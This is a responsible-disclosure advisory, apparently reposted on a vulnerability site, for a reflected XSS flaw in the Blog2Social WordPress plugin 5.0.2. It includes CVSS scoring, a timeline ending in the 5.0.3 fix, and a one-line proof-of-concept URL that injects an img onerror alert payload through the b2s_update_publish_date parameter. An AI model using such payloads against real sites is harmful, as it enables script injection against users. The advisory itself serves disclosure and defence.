WordPress Blog2Social 5.0.2 Cross Site Scripting

2019.02.05
Credit: Tim Coen
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

* Vulnerability: XSS * Affected Software: [Blog2Social](https://wordpress.org/plugins/blog2social/) * Affected Version: 5.0.2 * Patched Version: 5.0.3 * CVE: not requested * Risk: Medium * Vendor Contacted: 10/25/2018 * Vendor Fix: 11/13/2018 * Public Disclosure: 02/05/2019 * Credit: Tim Coen ##### CVSS 6.1 Medium [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) ##### Overview The Blog2Social WordPress plugin is vulnerable to reflected XSS as it echoes the b2s_update_publish_date parameter without proper encoding. ##### Proof of Concept http://192.168.0.103/wordpress/wp-admin/admin.php?page=blog2social-ship&postId=70&b2s_action=1&b2s_update_publish_date='"><img src=x onerror=alert(1)> ##### Timeline - 10/25/2018 Sent advisory - 10/26/2018 Vendor confirms recipt of advisory - 11/13/2018 Vendor releases fix - 02/05/2019 Confirmed Fix & Disclosure ##### Details & Full Advisory URL https://security-consulting.icu/blog/2019/02/wordpress-blog2social-xss/ -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top